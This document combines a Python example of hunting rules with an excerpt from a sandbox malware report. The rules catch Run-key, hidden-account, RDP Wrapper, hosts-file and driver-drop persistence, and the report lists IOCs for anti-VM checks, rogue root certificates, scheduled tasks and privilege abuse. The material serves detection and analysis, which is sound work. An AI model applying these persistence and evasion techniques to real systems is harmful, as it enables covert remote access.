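Hunting rules for the registry and file artefacts in the "Drops file in Drivers directory", "Adds Run key to start application", "Modifies WinLogon" and "Drops file in Program Files directory" signatures above, as an added example that is not part of this report or of any tool it names. The event schema and SAMPLE_EVENTS are constructed for the example: field names resemble Sysmon's registry-set and file-create events but nothing here parses real Sysmon output, and the image paths of the dropped binaries are assumed (the report does not say where they ran from). Rule and function names are this example's own. The last event is a benign installer registering a Run value from Program Files, which the rules must leave alone.

```python
"""Point rules for the persistence and defence-evasion artefacts reported
above, evaluated over a constructed Sysmon-like event list."""
from typing import Dict, List, Set, Tuple

Event = Dict[str, object]
Hit = Tuple[str, str, str]  # (rule name, writing image, registry key or file path)

# Constructed telemetry, not from the sandbox run. "reg_set" mirrors Sysmon
# EID 13 (registry value set), "file_write" mirrors EID 11 (file create).
# Keys, paths and values copy the IOCs reported above; image paths are assumed.
SAMPLE_EVENTS: List[Event] = [
    {"kind": "reg_set", "image": r"C:\ProgramData\RealtekHD\taskhostw.exe",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio",
     "value": r"C:\ProgramData\RealtekHD\taskhostw.exe"},
    {"kind": "reg_set", "image": r"C:\Users\Admin\AppData\Local\Temp\hjjgaa.exe",
     "key": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kissq",
     "value": r"C:\Users\Admin\AppData\Local\Temp\kissq.exe"},
    {"kind": "reg_set", "image": r"C:\Users\Admin\AppData\Local\Temp\update.exe",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John",
     "value": 0},
    {"kind": "reg_set", "image": r"C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions",
     "value": 1},
    {"kind": "file_write", "image": r"C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe",
     "path": r"C:\Program Files\RDP Wrapper\rdpwrap.dll"},
    {"kind": "file_write", "image": r"C:\Windows\System32\cmd.exe",
     "path": r"C:\Windows\System32\drivers\etc\hosts"},
    {"kind": "file_write", "image": r"C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp",
     "path": r"C:\Windows\system32\drivers\iaStorE.sys"},
    # Benign control: an installer under Program Files registering its agent.
    {"kind": "reg_set", "image": r"C:\Program Files\Vendor\setup.exe",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "value": r"C:\Program Files\Vendor\agent.exe"},
]

USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\temp\\", "%appdata%", "%temp%")


def is_user_writable(path: str) -> bool:
    """True for ProgramData, AppData and Temp locations a standard user can write."""
    p = path.lower().strip('"')
    return any(token in p for token in USER_WRITABLE)


def _key(ev: Event) -> str:
    return str(ev.get("key", "")).lower()


def _path(ev: Event) -> str:
    return str(ev.get("path", "")).lower()


def run_key_user_writable(ev: Event) -> bool:
    """Run/RunOnce value whose target lives in a user-writable directory."""
    k = _key(ev)
    return (ev["kind"] == "reg_set"
            and ("\\currentversion\\run\\" in k or "\\currentversion\\runonce\\" in k)
            and is_user_writable(str(ev["value"])))


def hidden_local_account(ev: Event) -> bool:
    """SpecialAccounts\\UserList\\<name> = 0 hides <name> from the logon screen."""
    return (ev["kind"] == "reg_set"
            and "\\winlogon\\specialaccounts\\userlist\\" in _key(ev)
            and ev["value"] == 0)


def rdp_wrapper_install(ev: Event) -> bool:
    """rdpwrap.dll/.ini dropped, or concurrent RDP sessions switched on."""
    if ev["kind"] == "file_write":
        return "\\rdp wrapper\\rdpwrap." in _path(ev)
    return (ev["kind"] == "reg_set"
            and _key(ev).endswith("\\winlogon\\allowmultipletssessions")
            and ev["value"] == 1)


def hosts_file_tamper(ev: Event) -> bool:
    """Any write to drivers\\etc\\hosts; rare outside provisioning, so alert on all."""
    return ev["kind"] == "file_write" and _path(ev).endswith("\\drivers\\etc\\hosts")


def driver_drop_from_user_dir(ev: Event) -> bool:
    """A .sys landing in System32\\drivers, written by something running from a
    user-writable path rather than an installer under Program Files."""
    p = _path(ev)
    return (ev["kind"] == "file_write" and "\\system32\\drivers\\" in p
            and p.endswith(".sys") and is_user_writable(str(ev["image"])))


RULES = [run_key_user_writable, hidden_local_account, rdp_wrapper_install,
         hosts_file_tamper, driver_drop_from_user_dir]


def evaluate(events: List[Event]) -> List[Hit]:
    """Run every rule over every event; one hit per (rule, event) match."""
    hits: List[Hit] = []
    for ev in events:
        artefact = str(ev.get("key") or ev.get("path") or "")
        for rule in RULES:
            if rule(ev):
                hits.append((rule.__name__, str(ev["image"]), artefact))
    return hits


def fired_rules(events: List[Event]) -> Set[str]:
    return {rule for rule, _, _ in evaluate(events)}


if __name__ == "__main__":
    for rule, image, artefact in evaluate(SAMPLE_EVENTS):
        print(f"{rule:26} {image} -> {artefact}")
```

The Run-key rule keys on where the target lives, not on the key itself, which is what keeps the benign installer quiet; the hosts rule deliberately ignores the writer because cmd.exe is a legitimate binary here and the parent process is not in this schema.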
  • Drops file in Windows directory
    Processes: MicrosoftEdge.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
  • Launches sc.exe

    Description

    sc.exe is the built-in Windows utility for creating, configuring, starting and stopping services.

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage and optical drives. Sandboxes flag this as possible ransomware behaviour, but stealers enumerate drives for the same reason (finding files to harvest), so treat it as context rather than a verdict on its own.

    TTPs

    System Information Discovery
  • Checks SCSI registry key(s)
    Processes: 97535F5358BB4449.exe (two instances)

    Description

    SCSI device strings (vendor, product, FriendlyName, DeviceDesc) are often read to detect sandboxes and virtual machines by matching them against known hypervisor identifiers; what the sample saw here were the analysis VM's own "HeartDisk" disk and "Sanu DVD-ROM" entries.

    TTPs

    Query Registry, Peripheral Device Discovery, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName | 97535F5358BB4449.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 | 97535F5358BB4449.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc | 97535F5358BB4449.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName | 97535F5358BB4449.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName | 97535F5358BB4449.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc | 97535F5358BB4449.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc | 97535F5358BB4449.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 | 97535F5358BB4449.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName | 97535F5358BB4449.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 | 97535F5358BB4449.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc | 97535F5358BB4449.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 | 97535F5358BB4449.exe
  • Checks processor information in registry
    Processes: winit.exe, azur.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | winit.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | winit.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | azur.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | azur.exe
  • Creates scheduled task(s)
    Processes: schtasks.exe (7 invocations)

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pid | process
    4408 | schtasks.exe
    1208 | schtasks.exe
    2896 | schtasks.exe
    1080 | schtasks.exe
    2532 | schtasks.exe
    4544 | schtasks.exe
    484 | schtasks.exe
  • Delays execution with timeout.exe
    Processes: timeout.exe (6 invocations)

    Reported IOCs

    pid | process
    200 | timeout.exe
    4956 | timeout.exe
    5112 | timeout.exe
    5080 | timeout.exe
    2164 | timeout.exe
    4528 | timeout.exe
  • Gathers network information
    ipconfig.exe

    Description

    Uses commandline utility to view network configuration.

    TTPs

    System Information Discovery, Command-Line Interface

    Reported IOCs

    pid | process
    5636 | ipconfig.exe
  • Kills process with taskkill
    Processes: taskkill.exe (4 invocations)

    Reported IOCs

    pid | process
    4228 | taskkill.exe
    2892 | taskkill.exe
    4316 | taskkill.exe
    5360 | taskkill.exe
  • Modifies registry class
    Processes: MicrosoftEdge.exe, R8.exe, Downloads.exe, winit.exe, cmd.exe, wini.exe

    Description

    Most rows here are MicrosoftEdge.exe first-run state (IE/Chrome migration, favourites, cache and the sandbox's seeded TypedURLs) and are environment noise; the rows attributed to Downloads.exe, winit.exe, wini.exe, R8.exe and cmd.exe are the sample's own.

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs | MicrosoftEdge.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" | MicrosoftEdge.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" | MicrosoftEdge.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming | MicrosoftEdge.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" | MicrosoftEdge.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites | MicrosoftEdge.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content | MicrosoftEdge.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath | MicrosoftEdge.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" | MicrosoftEdge.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix | MicrosoftEdge.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings | R8.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration | MicrosoftEdge.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 | MicrosoftEdge.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies | MicrosoftEdge.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | Downloads.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | winit.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings | cmd.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" | MicrosoftEdge.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601 | MicrosoftEdge.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache | MicrosoftEdge.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings | wini.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" | MicrosoftEdge.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" | MicrosoftEdge.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" | MicrosoftEdge.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" | MicrosoftEdge.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder | MicrosoftEdge.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache | MicrosoftEdge.exe
    Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration | MicrosoftEdge.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601 | MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigrationMicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdgeMicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigrationMicrosoftEdge.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"MicrosoftEdge.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"MicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"MicrosoftEdge.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"MicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet SettingsMicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"MicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"MicrosoftEdge.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\HistoryMicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\MIME\Databasewinit.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepagewinit.exe
    Set value (data)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601MicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"MicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet SettingsMicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InstanceDownloads.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"MicrosoftEdge.exe
  • Modifies system certificate store
    aliens.exe

    TTPs

    Install Root Certificate, Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD | aliens.exe
    Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 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 | .exe
  • NTFS ADS
    taskhost.exe, update.exe, utorrent.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\ | taskhost.exe
    File opened for modification | C:\Users\Admin\Desktop\WinMgmts:\ | update.exe
    File opened for modification | C:\Users\Admin\Desktop\WinMgmts:\ | utorrent.exe
  • Runs .reg file with regedit
    regedit.exe, regedit.exe

    Reported IOCs

    pid | process
    2596 | regedit.exe
    3948 | regedit.exe
  • Runs net.exe
  • Runs ping.exe
    PING.EXE, PING.EXE

    TTPs

    Remote System Discovery

    Reported IOCs

    pid | process
    5348 | PING.EXE
    4880 | PING.EXE
  • Suspicious behavior: AddClipboardFormatListener
    api.exe

    Reported IOCs

    pid | process
    1620 | api.exe
  • Suspicious behavior: EnumeratesProcesses
    update.exe, rutserv.exe, rutserv.exe, rutserv.exe, rutserv.exe, winit.exe

    Reported IOCs

    pid | process
    4028 | update.exe
    4028 | update.exe
    4028 | update.exe
    4028 | update.exe
    4028 | update.exe
    4028 | update.exe
    4028 | update.exe
    4028 | update.exe
    4028 | update.exe
    4028 | update.exe
    2108 | rutserv.exe
    2108 | rutserv.exe
    2108 | rutserv.exe
    2108 | rutserv.exe
    2108 | rutserv.exe
    2108 | rutserv.exe
    1628 | rutserv.exe
    1628 | rutserv.exe
    1276 | rutserv.exe
    1276 | rutserv.exe
    2228 | rutserv.exe
    2228 | rutserv.exe
    2228 | rutserv.exe
    2228 | rutserv.exe
    2228 | rutserv.exe
    2228 | rutserv.exe
    2228 | rutserv.exe
    2228 | rutserv.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
    632 | winit.exe
  • Suspicious behavior: GetForegroundWindowSpam
    taskhostw.exe, taskhost.exe, api.exe

    Reported IOCs

    pid | process
    4964 | taskhostw.exe
    4244 | taskhost.exe
    1620 | api.exe
  • Suspicious behavior: LoadsDriver

    Reported IOCs

    pid | process
    612
    612
    612
  • Suspicious use of AdjustPrivilegeToken
    rutserv.exe, rutserv.exe, rutserv.exe, taskkill.exe, taskkill.exe, taskkill.exe, OnlineInstaller.exe, OnlineInstaller.tmp, AUDIODG.EXE, RDPWInst.exe, RDPWinst.exe, system.exe, svchost.exe, api.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 2108 | rutserv.exe
    Token: SeDebugPrivilege | 1276 | rutserv.exe
    Token: SeTakeOwnershipPrivilege | 2228 | rutserv.exe
    Token: SeTcbPrivilege | 2228 | rutserv.exe
    Token: SeTcbPrivilege | 2228 | rutserv.exe
    Token: SeDebugPrivilege | 4228 | taskkill.exe
    Token: SeDebugPrivilege | 2892 | taskkill.exe
    Token: SeDebugPrivilege | 4316 | taskkill.exe
    Token: SeDebugPrivilege | 4404 | OnlineInstaller.exe
    Token: SeLoadDriverPrivilege | 4404 | OnlineInstaller.exe
    Token: SeDebugPrivilege | 4856 | OnlineInstaller.tmp
    Token: SeLoadDriverPrivilege | 4856 | OnlineInstaller.tmp
    Token: 33 | 4780 | AUDIODG.EXE
    Token: SeIncBasePriorityPrivilege | 4780 | AUDIODG.EXE
    Token: SeDebugPrivilege | 1400 | RDPWInst.exe
    Token: SeDebugPrivilege | 4216 | RDPWinst.exe
    Token: SeDebugPrivilege | 4416 | system.exe
    Token: SeAuditPrivilege | 4580 | svchost.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
